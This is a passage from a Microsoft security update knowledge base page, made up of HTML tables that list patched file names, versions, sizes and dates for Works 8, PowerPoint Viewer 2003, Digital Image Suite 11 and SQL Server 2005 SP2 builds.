gdiplus.dll file, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/831932\" id=\"kb-link-35\">831932 </a>Description of the Visio 2002 security update: October 12, 2004<br/></div></span><h4 class=\"sbody-h4\">For Works 8</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">1,724,416</td><td class=\"sbody-td\">18-Aug-2008</td><td class=\"sbody-td\">19:36</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gifimp32.flt</td><td class=\"sbody-td\">2003.1100.8165.0</td><td class=\"sbody-td\">222,048</td><td class=\"sbody-td\">18-Aug-2008</td><td class=\"sbody-td\">19:36</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Png32.flt</td><td class=\"sbody-td\">2003.1100.8165.0</td><td class=\"sbody-td\">207,704</td><td class=\"sbody-td\">18-Aug-2008</td><td class=\"sbody-td\">19:36</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pptview.exe</td><td class=\"sbody-td\">11.0.8164.0</td><td class=\"sbody-td\">1,661,280</td><td class=\"sbody-td\">18-Aug-2008</td><td class=\"sbody-td\">19:37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wkssole.dll</td><td class=\"sbody-td\">8.7.216.0</td><td class=\"sbody-td\">234,504</td><td class=\"sbody-td\">18-Aug-2008</td><td class=\"sbody-td\">19:36</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wksssdb.dll</td><td class=\"sbody-td\">8.7.216.0</td><td class=\"sbody-td\">2,028,904</td><td class=\"sbody-td\">18-Aug-2008</td><td class=\"sbody-td\">19:36</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpgimp32.flt</td><td class=\"sbody-td\">2003.1100.8202.0</td><td class=\"sbody-td\">136,712</td><td class=\"sbody-td\">18-Aug-2008</td><td class=\"sbody-td\">19:36</td></tr></table></div><h4 class=\"sbody-h4\">For PowerPoint Viewer 2003</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">11.0.8230.0</td><td class=\"sbody-td\">1,702,408</td><td class=\"sbody-td\">13-Aug-2008</td><td class=\"sbody-td\">07:31</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Intldate.dll</td><td class=\"sbody-td\">11.0.5510.0</td><td class=\"sbody-td\">64,064</td><td class=\"sbody-td\">14-Jul-2003</td><td class=\"sbody-td\">22:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pptview.exe</td><td class=\"sbody-td\">11.0.8164.0</td><td class=\"sbody-td\">1,661,280</td><td class=\"sbody-td\">19-Apr-2007</td><td class=\"sbody-td\">13:49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ppvwintl.dll </td><td class=\"sbody-td\">11.0.8161.0</td><td class=\"sbody-td\">131,424</td><td class=\"sbody-td\">22-Mar-2007</td><td class=\"sbody-td\">19:05</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pvreadme.htm</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">4,189</td><td class=\"sbody-td\">19-Jun-2008</td><td class=\"sbody-td\">12:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Saext.dll</td><td class=\"sbody-td\">11.0.8161.0</td><td class=\"sbody-td\">218,456</td><td class=\"sbody-td\">22-Mar-2007</td><td class=\"sbody-td\">19:25</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Unicows.dll</td><td class=\"sbody-td\">1.0.3703.0</td><td class=\"sbody-td\">246,424</td><td class=\"sbody-td\">30-Oct-2002</td><td class=\"sbody-td\">12:21</td></tr></table></div><h4 class=\"sbody-h4\">For Digital Image Suite 11</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Advpack.dll</td><td class=\"sbody-td\">6.0.2900.2180</td><td class=\"sbody-td\">99,840</td><td class=\"sbody-td\">19-Aug-2008</td><td class=\"sbody-td\">14:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.1.3102.3352</td><td class=\"sbody-td\">1,724,416</td><td class=\"sbody-td\">10-Jul-2008</td><td class=\"sbody-td\">17:44</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W95inf16.dll</td><td class=\"sbody-td\">4.71.704.0</td><td class=\"sbody-td\">2,272</td><td class=\"sbody-td\">19-Aug-2008</td><td class=\"sbody-td\">14:29</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">W95inf32.dll</td><td class=\"sbody-td\">4.71.16.0</td><td class=\"sbody-td\">4,608</td><td class=\"sbody-td\">19-Aug-2008</td><td class=\"sbody-td\">14:29</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">File information for Microsoft SQL Server</h3><span>The English (United States) version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the <strong class=\"uiterm\">Time Zone</strong> tab in the <strong class=\"uiterm\">Date and Time</strong> item in Control Panel. </span><h4 class=\"sbody-h4\">For x86-based versions of the SQL Server 2005 Service Pack 2 GDR </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">799760</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasks.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">295952</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasksui.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">721936</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msdtssrvr.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">205840</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdsrv.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">14894608</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">nsservice.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">21520</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesnativeserver.dll</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">133136</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesservice.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">16912</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebserver.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">1725456</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebuserinterface.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">1332240</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rsclientprint.cab</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1183366</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">18:00</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlaccess.dll</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">350224</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlservr.exe</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">29184016</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwb.exe</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">823824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For x64-based versions of the SQL Server 2005 Service Pack 2 GDR</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">799760</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasks.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">295952</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasksui.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">721936</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.visualstudio.templatewizardinterface.dll</td><td class=\"sbody-td\">8.0.50727.42</td><td class=\"sbody-td\">15872</td><td class=\"sbody-td\">23-Sep-05</td><td class=\"sbody-td\">6:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msdtssrvr.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">201744</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdsrv.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">30126096</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">nsservice.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">21520</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesnativeserver.dll</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">161296</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesservice.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">16912</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebserver.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">1725456</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebuserinterface.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">1332240</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rsclientprint.cab</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1183366</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">18:00</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlaccess.dll</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">357392</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlservr.exe</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">39633936</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:56</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwb.exe</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">823824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For Itanium-based versions of the SQL Server 2005 Service Pack 2 GDR</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">799760</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">799760</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasks.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">295952</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasksui.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">721936</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.visualstudio.templatewizardinterface.dll</td><td class=\"sbody-td\">8.0.50727.42</td><td class=\"sbody-td\">15872</td><td class=\"sbody-td\">23-Sep-05</td><td class=\"sbody-td\">6:56</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msdtssrvr.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">201744</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msmdsrv.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">48762896</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">nsservice.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">21520</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesnativeserver.dll</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">274448</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingservicesservice.exe</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">16912</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebserver.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">1725456</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">reportingserviceswebuserinterface.dll</td><td class=\"sbody-td\">9.0.3073.0</td><td class=\"sbody-td\">1332240</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">rsclientprint.cab</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1183366</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">18:00</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlaccess.dll</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">351760</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlservr.exe</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">72529424</td><td class=\"sbody-td\">6-Aug-08</td><td class=\"sbody-td\">4:24</td><td class=\"sbody-td\">ia64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">sqlwb.exe</td><td class=\"sbody-td\">2005.90.3073.0</td><td class=\"sbody-td\">823824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">17:58</td><td class=\"sbody-td\">x86</td></tr></table></div><h4 class=\"sbody-h4\">For x86-based versions of the SQL Server 2005 Service Pack 2 hotfix </h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">autoadmin90.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">901656</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">bcp.exe</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">68632</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">connectiondlg.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">959512</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dts.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">1102360</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtsconn.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">250392</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">dtspipeline.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">605208</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfiledest.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">256024</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">flatfilesrc.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">264728</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">mergetxt.dll</td><td class=\"sbody-td\">2005.90.3282.0</td><td class=\"sbody-td\">32280</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.controls.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">2765848</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.design.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">5456920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1217560</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.managementdialogs.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1717272</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.analysisservices.wizards.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">6161432</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.datawarehouse.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1279000</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">160792</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.sapbw.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">42008</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.dataextensions.xmlaclient.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">562200</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.designer.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">4817944</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.designer.wizards.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">2221080</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.diagnostics.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">799768</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.excelrendering.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">336920</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.htmlrendering.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">308248</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.imagerendering.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">291864</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.processingcore.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">1676312</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.reportingservices.sharepoint.server.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">111640</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.connectioninfo.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">156696</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.dmquerytask.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">332824</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.dtstransferprovider.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">115736</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasks.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">295960</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.maintenanceplantasksui.dll</td><td class=\"sbody-td\">9.0.3282.0</td><td class=\"sbody-td\">721944</td><td class=\"sbody-td\">5-Aug-08</td><td class=\"sbody-td\">9:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">microsoft.sqlserver.replication.dll</td><td 